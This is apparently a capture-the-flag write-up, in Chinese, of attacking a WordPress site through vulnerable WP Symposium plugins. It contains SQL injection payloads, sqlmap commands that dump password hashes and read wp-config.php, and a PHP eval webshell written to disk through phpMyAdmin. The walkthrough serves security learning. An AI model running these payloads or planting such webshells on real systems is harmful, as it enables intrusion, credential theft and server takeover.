Wordpress插件渗透测试

0x00 信息收集

网址是一个wordpress博客。

1
Apache/2.4.10 (Debian)

既然是wp,直接用wpscan扫一扫。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
[+] We found 2 plugins:
[+] Name: akismet
| Latest version: 3.3.4
| Location: http://218.2.197.234:2040/wp-content/plugins/akismet/
[!] We could not determine a version so all vulnerabilities are printed out
[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8215
Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5
[+] Name: wp-symposium - v15.1
| Location: http://218.2.197.234:2040/wp-content/plugins/wp-symposium/
| Readme: http://218.2.197.234:2040/wp-content/plugins/wp-symposium/readme.txt
[!] The version is out of date, the latest version is 15.8.1

找到了两个“过气”插件,存在漏洞。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
[!] Title: WP Symposium <= 15.1 - SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/7902
Reference: http://permalink.gmane.org/gmane.comp.security.oss.general/16479
Reference: http://packetstormsecurity.com/files/131801/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3325
Reference: https://www.exploit-db.com/exploits/37080/
[i] Fixed in: 15.4
[!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8140
Reference: https://plugins.trac.wordpress.org/changeset/1214872/wp-symposium
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6522
Reference: https://www.exploit-db.com/exploits/37824/
[i] Fixed in: 15.8
[!] Title: WP Symposium <= 15.1 - Blind SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8148
Reference: https://security.dxw.com/advisories/blind-sql-injection-in-wp-symposium-allows-unauthenticated-attackers-to-access-sensitive-data/
[i] Fixed in: 15.8

0x01 漏洞利用

CVE-2015-3325的sql注入是利用wp-symposium插件中的get_album_item.php。

1
2
3
4
5
6
7
8
9
10
<?php
include_once('../../../wp-config.php');
global $wpdb;
$iid = $_REQUEST['iid'];
$size = $_REQUEST['size'];
$sql = "SELECT ".$size." FROM ".$wpdb->base_prefix."symposium_gallery_items WHERE iid = %d";
$image = $wpdb->get_var($wpdb->prepare($sql, $iid));
header("Content-type: image/jpeg");
echo stripslashes($image);
?>

构造size参数,来进行sql查询,代码也没有过滤,但是在查询列名限制table_name的时候却没有返回,如果不限制table_name,会因为文件大小限制只显示1kb的内容,看不到wp_users的列名。

1
?size=group_concat(column_name) FROM information_schema.columns WHERE table_schema=database() and table_name=%27users%27%20;%20--

无奈,放弃这个漏洞,看那个盲注的CVE。

https://www.exploit-db.com/exploits/37822/

topic_id参数存在盲注,访问对应页面,将post请求保存到文件中,用sqlmap来测试。(测试的时候没有删掉exp中的sleep函数,导致脚本多跑了好久。。。)

1
sqlmap -r "E:\1.txt" --dbs --level 3
1
2
3
4
5
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] wordpress

表名

1
sqlmap -r "E:\1.txt" -D "wordpress" --tables

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
Database: wordpress
[36 tables]
+------------------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_symposium_audit |
| wp_symposium_cats |
| wp_symposium_chat2 |
| wp_symposium_chat2_typing |
| wp_symposium_chat2_users |
| wp_symposium_comments |
| wp_symposium_events |
| wp_symposium_events_bookings |
| wp_symposium_extended |
| wp_symposium_following |
| wp_symposium_friends |
| wp_symposium_gallery |
| wp_symposium_gallery_items |
| wp_symposium_group_members |
| wp_symposium_groups |
| wp_symposium_likes |
| wp_symposium_lounge |
| wp_symposium_mail |
| wp_symposium_news |
| wp_symposium_styles |
| wp_symposium_subs |
| wp_symposium_topics |
| wp_symposium_topics_images |
| wp_symposium_topics_scores |
| wp_symposium_usermeta |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+------------------------------+

列名

1
sqlmap -r "E:\1.txt" -D "wordpress" -T "wp_users" --columns

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Database: wordpress
Table: wp_users
[10 columns]
+---------------------+---------------------+
| Column | Type |
+---------------------+---------------------+
| display_name | varchar(250) |
| ID | bigint(20) unsigned |
| user_activation_key | varchar(60) |
| user_email | varchar(100) |
| user_login | varchar(60) |
| user_nicename | varchar(50) |
| user_pass | varchar(64) |
| user_registered | datetime |
| user_status | int(11) |
| user_url | varchar(100) |
+---------------------+---------------------+

查询内容

1
sqlmap -r "E:\1.txt" -D "wordpress" -T "wp_users" -C "user_pass" --dump

1
2
3
4
5
+------------------------------------+
| user_pass |
+------------------------------------+
| $P$BoRvgt/kaEDWqyiq0a3U8QjUQAO6gQ0 |
+------------------------------------+

用CVE-2015-3325按照对应的表名列名也是能查到管理员。

1
?size=group_concat(user_nicename,0x7e,user_pass) FROM wp_users%20;%20--

但是数据库中的管理员密码是强加密的,没办法解密。

之前扫到服务器还有一个phpmyadmin网页,可以从这里入手。

用sqlmap扫描phpmyadmin的密码。

1
sqlmap -r "E:\1.txt" --current-user --password

1
2
3
4
5
6
7
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *AA59232D46C9C0751BA3069045A0B90F3C6431C4
[*] root [1]:
password hash: *74ACCF7FB15CDBAEE88B9E7F7B58352D3308CFF2
[*] wordpress [1]:
password hash: *A22BD9F95BF505E792C556FC1EF9FCFA6B6B5D9B

也是没有办法解密。。。

经过表哥提示,直接利用sqlmap读取wp的配置文件。

1
sqlmap -r "E:\1.txt" --file-read "/var/www/html/wp-config.php" -p "topic_id"

成功读取到phpmyadmin的账户密码。

Getshell

登陆到phpmyadmin,通过sql查询语句写入shell。

1
select '<?php @eval($_POST[adadminn])?>'INTO OUTFILE '/var/www/html/nibuhuicaidao.php';

报错:Can't create/write to file '/var/www/html/nibuhuicaidao.php' (Errcode: 13)

提示目录不可写。

用dirbuster工具爆破了一下目录,发现还有一个image的目录,测试,发现可写。

1
select '<?php @eval($_POST[adadminn])?>'INTO OUTFILE '/var/www/html/images/nibuhuicaidao.php';

菜刀链接,拿到flagflag{Hi_Web_fLaG_Is_HEre}